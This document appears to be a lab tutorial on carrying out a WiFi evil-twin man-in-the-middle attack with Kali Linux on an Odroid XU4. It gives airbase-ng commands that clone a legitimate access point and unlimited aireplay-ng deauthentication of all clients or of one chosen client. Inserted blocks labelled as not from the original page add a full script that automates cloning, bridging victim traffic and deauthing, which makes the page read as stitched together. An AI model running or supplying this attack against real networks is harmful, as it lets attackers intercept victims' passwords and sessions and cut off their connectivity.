Evil Twin Attack via Kali on Odroid XU4

From Embedded Lab Vienna for IoT & Security

Summary

The Evil Twin (ET) Attack is a type of Machine-in-the-Middle (MitM) attack carried out over WiFi. Its basic premise is to fool victims into thinking they are connecting to a legitimate access point (AP), when in fact they are connecting to the attacker's "evil twin" AP.

The goal of the attack usually coincides with the typical goals of any MitM attack. All traffic leaving the local network for the internet passes through the default gateway, so once a client is connected to the ET, the attacker sees all of the victim's outgoing traffic. The attacker forwards that traffic to the legitimate gateway, posing as the victim, and relays the answers back. Network traffic flows like normal, but via the attacker: endpoints still communicate with each other as before, while the victim's data is at the attacker's mercy. This data can include passwords or entire sessions used to access e-mail accounts or social networks. Traffic that is protected end-to-end by TLS stays confidential unless the victim can also be tricked into accepting a forged certificate or into falling back to plaintext. Measured against the CIA triad, the implications are massive: an attacker in this position can compromise confidentiality by eavesdropping, integrity by modifying messages, and availability by intercepting, delaying or dropping them.

The attack is conducted as follows. First, the attacker has to find out which access point the intended victim is using. If no specific victim is targeted, the attacker can also pick a commonly used access point such as a public WiFi hotspot. Once the access point to impersonate is chosen, the attacker notes its Service Set Identifier (SSID) and its Basic Service Set Identifier (BSSID). The SSID is the network name displayed to users trying to connect to a WiFi AP, while the BSSID is the MAC address of the AP itself. Obtaining both is no complicated feat, as access points broadcast them constantly in their beacon frames so that clients can find them. If the attacker broadcasts the same information, the evil twin shows up in the list of available networks on the victim's device with the same SSID and BSSID as the legitimate access point. With the tools described in more detail below, clients can then be disconnected from the legitimate AP. The attacker's aim is to transmit with a stronger signal than the legitimate access point, so that devices pick the "best" available access point, which is the evil twin.

If the original access point is password protected, additional measures are needed. Password protected access points are not immune to Evil Twin Attacks, especially when the password is easy to obtain. Cafés, hotels and similar institutions tend to share their access point's password with their customers. Even a private WiFi hotspot's password can often be obtained through unsophisticated social engineering: an attacker innocently asking for the WiFi password may get it from anyone who knows it. Another possibility, for WPA/WPA2-PSK networks, is to capture the four-way handshake between the legitimate AP and a client and crack the pre-shared key offline from that capture. In any case, as soon as the password is obtained, it can be added to the evil twin's configuration.


Requirements/Hardware

Operating system: Kali Linux ODROID-XU3

Hardware:

  • Existing WiFi hotspot for impersonation
  • Client connected to WiFi hotspot
  • ODROID XU4 single-board computer (incl. power supply unit 5V/4A)
  • eMMC (min. 8GB)
  • microSD (min. 8GB)
  • microSD to USB adapter
  • Mouse
  • Keyboard
  • Monitor (via HDMI)
  • Two WiFi adapters (e.g. Alfa AWUS036EAC)

Installing Kali on ODROID XU4

Step 1: Download

Download the Kali image. Kali provides an image for the ODROID-XU3; since the XU4 is very similar to the XU3, that image can be used on an XU4 board.

Step 2: Preparation

Note: It is recommended to use Balena Etcher, as it works for different OS and does the two steps of formatting and flashing in the same process.

  • Insert the microSD card into your PC (use the adapter if required)
  • Format the microSD card with Balena Etcher or SD Formatter. If you use SD Formatter: don't forget to check "Format Size Adjustment" in "Options".
  • Flash the OS image to the microSD card. Required: a program to create bootable devices, e.g. Win32 Disk Imager on Windows (not needed if Balena Etcher was used, as it flashes in the same step).

Step 3: Installing

For the following steps you might need the manual for ODROID XU4 to see where the mentioned parts are located.

  • Attach the eMMC module to the ODROID XU4
  • Switch the Boot Mode Selector to "microSD"
  • Put in the microSD card
  • Attach mouse, keyboard and monitor to the XU4. Make sure that all of them are attached before booting - otherwise you will receive a kernel error.
  • After that: attach the power supply.


If all steps were performed correctly:

  • The fan of the ODROID XU4 starts
  • The blue LED should be on (solid light): bootloader running.
  • Monitor should display booting.

This can take a while.

Username: kali
Password: kali


States of the ODROID XU4 LED:

  • red LED: on when power is supplied
  • blue LED (solid): the bootloader is running
  • blue LED (blinks slowly, like a heartbeat): the kernel is running
  • blue LED (blinks fast): kernel panic

Performing the Evil Twin Attack on Kali Linux

Interface Designation and Information Gathering

Plug the WiFi adapters into the XU4 and check that they are recognized

sudo ifconfig

If the interfaces are not recognized, try rebooting the XU4.


Check the available wireless interfaces

Take note of their names, as the interfaces will be used in the attack.

sudo iwconfig 


Find out the BSSID and which channel the legitimate AP uses

This can be done in two ways. If the SSID (network name) of the hotspot is known, use one of the wireless interfaces noted in the previous step and run

sudo iw <interface name> scan | grep -B 8 -A 2 <SSID>

This prints the scan entry of the specified SSID if the AP is in range. The entry contains the BSSID (on the "BSS" line), the frequency and, for 2.4 GHz networks, the channel (on the "DS Parameter set" line). If the entry is cut off, increase the number of context lines passed to grep.

Alternatively, the channel is also shown in the output of airodump-ng (column CH), next to the BSSID and ESSID. To use airodump-ng, first put one of the available interfaces into monitor mode. Note that airmon-ng renames the interface it puts into monitor mode (typically by appending "mon", e.g. wlan0mon); use that name in all following commands. If airmon-ng warns about interfering processes such as NetworkManager or wpa_supplicant, stop them first, otherwise the adapter may be taken out of monitor mode again.

sudo airmon-ng start <interface name>

Then read the BSSID, channel and ESSID of the target AP from the tool's output:

sudo airodump-ng <monitoring interface name>

After gathering the information, be sure to stop the monitoring for now:

sudo airmon-ng stop <monitoring interface name>
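Reading the BSSID and channel off a long scan with grep context lines is fragile, in particular for 5 GHz networks, whose iw entries usually carry no "DS Parameter set" line. The following added example (not code from the original page) parses the text that `iw dev <iface> scan` prints and reports BSSID, channel and security type for every BSS that advertises the given SSID, deriving the channel from the frequency where the entry lacks it. The scan text inside `sample_scan` is constructed to look like iw's output and is only there so the script runs offline; on the XU4 the function is fed from a real scan.

```shell
#!/bin/sh
# Added example: extract BSSID, channel and security type of every access point
# that advertises a given SSID from the text printed by `iw dev <iface> scan`.
# Not from the original page. iw indents its output with tabs; the parser accepts
# tabs or spaces so the constructed sample below (spaces) behaves the same.

# Usage: sudo iw dev wlan0 scan | find_ap 'CoffeeShop'
# Prints one line per matching BSS: "<bssid> channel=<n> freq=<MHz> security=<type>"
find_ap() {
    awk -v want="$1" '
    # 2.4 GHz entries carry the channel in "DS Parameter set"; 5 GHz entries often
    # do not, so fall back to deriving it from the centre frequency.
    function freq_to_chan(f) {
        if (f == 2484) return 14
        if (f >= 2412 && f <= 2472) return (f - 2407) / 5
        if (f >= 5000 && f <= 5900) return (f - 5000) / 5
        return "?"
    }
    # Emit the BSS collected so far if its SSID is the one we want, then reset.
    function flush() {
        if (bssid != "" && ssid == want) {
            if (chan == "") chan = freq_to_chan(freq)
            printf "%s channel=%s freq=%s security=%s\n", bssid, chan, freq, (sec == "" ? "OPEN" : sec)
        }
        bssid = ""; ssid = ""; chan = ""; freq = ""; sec = ""
    }
    /^BSS [0-9a-f:]+/          { flush(); bssid = $2; sub(/\(.*/, "", bssid) }  # "BSS aa:bb:...(on wlan0)"
    /^[ \t]+freq: /             { freq = $2 }
    /^[ \t]+SSID: /             { ssid = substr($0, index($0, "SSID: ") + 6) }   # SSIDs may contain spaces
    /^[ \t]+DS Parameter set: / { chan = $NF }
    /^[ \t]+RSN:/               { sec = "WPA2" }                                  # RSN element => WPA2
    /^[ \t]+WPA:/               { if (sec == "") sec = "WPA" }                    # WPA element only => WPA1
    END { flush() }
    '
}

# Constructed sample in the shape of `iw dev wlan0 scan` output (not a real capture).
sample_scan() {
    cat <<'EOF'
BSS aa:bb:cc:dd:ee:ff(on wlan0)
    freq: 2437
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -41.00 dBm
    SSID: CoffeeShop
    Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
    DS Parameter set: channel 6
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
BSS aa:bb:cc:dd:ee:f0(on wlan0)
    freq: 5180
    signal: -55.00 dBm
    SSID: CoffeeShop
    RSN:     * Version: 1
BSS 12:34:56:78:9a:bc(on wlan0)
    freq: 2462
    signal: -70.00 dBm
    SSID: Guest WiFi
    DS Parameter set: channel 11
EOF
}

# Stand-alone demonstration: both "CoffeeShop" BSSes, 2.4 GHz and 5 GHz.
sample_scan | find_ap 'CoffeeShop'
```

The security column matters for the next section: airbase-ng only creates an open AP, so a target reported as WPA2 needs the obtained password configured in an AP daemon that implements WPA before clients with a stored profile will reconnect to the twin.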


Start monitor mode on the wireless interface(s) used for the attack, locked to the legitimate AP's channel. Both airbase-ng and aireplay-ng require an interface in monitor mode; when using two adapters, repeat the command for each of them.

sudo airmon-ng start <interface> <channel>

Check: the output has to contain "monitor mode enabled" and names the new monitor interface (typically the interface name with "mon" appended), which is the name to use in all following commands.


Evil Twin Access Point Creation

Insert the captured SSID and BSSID information:

sudo airbase-ng -a <BSSID> --essid <ESSID> <interface>

After running the command, airbase-ng turns the wireless adapter into an access point that shows up in the list of available networks on devices in the area under the same name as the legitimate AP. airbase-ng also creates a TAP interface (at0 by default) through which the attacker's system reaches the evil twin's clients; the bridge described further below is built on this interface. Caveat: the access point created this way is open (unencrypted). Devices that have the legitimate network stored as a WPA/WPA2 network will not automatically reconnect to an open network of the same name, so for a password protected target the obtained password has to be configured in an AP daemon that implements WPA, such as hostapd, instead of airbase-ng.


Disassociation of Clients

Open a new terminal.

In this step, clients of the legitimate access point are deauthenticated and thereby lose their connection to it, and with it their internet connection.

Deauthenticating clients

sudo aireplay-ng --deauth 0 -a <router BSSID> <second monitoring interface>

The number after --deauth is the number of deauthentication bursts to send; 0 means unlimited, so the command keeps sending deauthentication frames until it is stopped. For this command to work, the monitoring interface used has to be on the same channel as the legitimate AP!

The broadcast variant does not always work: some clients ignore broadcast deauthentication frames, and clients that use Protected Management Frames (802.11w, mandatory with WPA3) discard forged deauthentication frames altogether.

Alternatively, a specific client can be disconnected by specifying the client MAC address.


Disconnect a specific client:

First run airodump-ng again, restricted to the router's BSSID and channel, to obtain the MAC address of the connected client (listed under STATION):

sudo airodump-ng <monitoring interface> --bssid <router BSSID> -c <router channel>

Then execute the deauth-command:

sudo aireplay-ng --deauth 0 -c <client MAC address> -a <router BSSID> <second monitoring interface>


Bring clients to connect to the fake AP

As soon as clients are disassociated from the legitimate AP, they lose their internet connectivity. Most devices then automatically try to reconnect to the known SSID and prefer the access point with the strongest signal; a user who reconnects manually will likely pick the entry with the best signal, which, depending on the OS, is usually shown at the top of the list of available APs. It is therefore in the attacker's interest to move close to the victim and to use a strong antenna, to increase the signal strength and the chances of success.

Additionally, before deauthenticating anyone, the attacker should bridge the evil twin's TAP interface (at0) to a link that leads to the legitimate router, so that the victim's traffic flows over the ET to the internet. Without this the victim notices the missing connectivity, and the MitM setup is incomplete.
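The steps of this section in one script, as an added example that is not code from the original page: monitor mode on both adapters, the airbase-ng clone, a Linux bridge between airbase-ng's at0 TAP interface and a wired uplink (so that the real router keeps serving DHCP and internet to the victim, through the attacker's box), and the deauthentication last. Everything configurable is an assumption: adapter names wlan0/wlan1, airmon-ng naming the monitor interfaces wlan0mon/wlan1mon, an Ethernet uplink eth0 plugged into the legitimate router's LAN, and the placeholder BSSID, ESSID and channel. With DRY_RUN=1 (the default) the script only prints the commands it would run; DRY_RUN=0 executes them and needs root.

```shell
#!/bin/sh
# Added example (not from the original page): the evil twin procedure of this
# section with the aircrack-ng commands the page describes, plus a bridge between
# airbase-ng's at0 tap interface and a wired uplink. All values below are
# placeholders/assumptions. DRY_RUN=1 (default) prints the commands; DRY_RUN=0
# runs them as root on the XU4.

AP_IFACE="${AP_IFACE:-wlan0}"                      # adapter that becomes the evil twin
DEAUTH_IFACE="${DEAUTH_IFACE:-wlan1}"              # adapter that sends deauthentication frames
UPLINK="${UPLINK:-eth0}"                           # wired link into the legitimate router's LAN (assumed)
TARGET_BSSID="${TARGET_BSSID:-00:11:22:33:44:55}"  # legitimate AP (placeholder)
TARGET_ESSID="${TARGET_ESSID:-CoffeeShop}"
TARGET_CHAN="${TARGET_CHAN:-6}"
DRY_RUN="${DRY_RUN:-1}"

# Run a command, or only print it in dry-run mode.
run() {
    if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Name airmon-ng gives the monitor interface (assumed "<iface>mon"; check its output).
monitor_name() { printf '%smon' "$1"; }

# Step 1: airbase-ng and aireplay-ng both need a monitor-mode interface locked to
# the legitimate AP's channel.
start_monitor() {
    run airmon-ng start "$AP_IFACE" "$TARGET_CHAN"
    run airmon-ng start "$DEAUTH_IFACE" "$TARGET_CHAN"
}

# Step 2: clone SSID and BSSID. airbase-ng stays in the foreground and creates the
# tap interface at0, so it is backgrounded and given a moment to bring at0 up.
start_evil_twin() {
    set -- airbase-ng -a "$TARGET_BSSID" --essid "$TARGET_ESSID" -c "$TARGET_CHAN" "$(monitor_name "$AP_IFACE")"
    if [ "$DRY_RUN" = 1 ]; then printf '%s &\n' "$*"; else "$@" & sleep 2; fi
}

# Step 3: bridge at0 with the uplink *before* deauthenticating, so that victims
# joining the twin get DHCP and internet from the real router through this box.
bridge_to_uplink() {
    run ip link add br0 type bridge
    run ip link set at0 up
    run ip link set "$UPLINK" up
    run ip link set at0 master br0
    run ip link set "$UPLINK" master br0
    run ip link set br0 up
}

# Step 4: kick clients off the legitimate AP. "--deauth 0" means an unlimited
# number of deauthentication bursts (not a delay), so aireplay-ng runs until it
# is interrupted. Pass a client MAC as $1 to target one station instead of all.
deauth_clients() {
    if [ -n "${1:-}" ]; then
        run aireplay-ng --deauth 0 -c "$1" -a "$TARGET_BSSID" "$(monitor_name "$DEAUTH_IFACE")"
    else
        run aireplay-ng --deauth 0 -a "$TARGET_BSSID" "$(monitor_name "$DEAUTH_IFACE")"
    fi
}

# Tear the bridge and the monitor interfaces down again.
cleanup() {
    run ip link set br0 down
    run ip link del br0
    run airmon-ng stop "$(monitor_name "$DEAUTH_IFACE")"
    run airmon-ng stop "$(monitor_name "$AP_IFACE")"
}

# The complete plan in the order the page prescribes; $1 optionally restricts
# the deauthentication to a single client MAC.
attack_plan() {
    trap 'cleanup; exit' INT TERM   # Ctrl-C stops aireplay-ng; clean up then
    start_monitor
    start_evil_twin
    bridge_to_uplink
    deauth_clients "${1:-}"
    cleanup
}

attack_plan "$@"
```

The bridge is a layer-2 choice: it needs a wired link into the real router's LAN (the XU4's Ethernet port), and in return nothing has to be configured on the attacker side, as the victim simply obtains its address from the legitimate router. If the only uplink is another WiFi adapter associated as a client, bridging generally does not work for wireless station interfaces, and a NAT setup with its own DHCP server on at0 has to be used instead.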


Error handling

If neither disconnecting all clients nor disconnecting a specific client worked, check whether the card supports packet injection (the interface has to be in monitor mode for this test):

sudo aireplay-ng --test <interface>
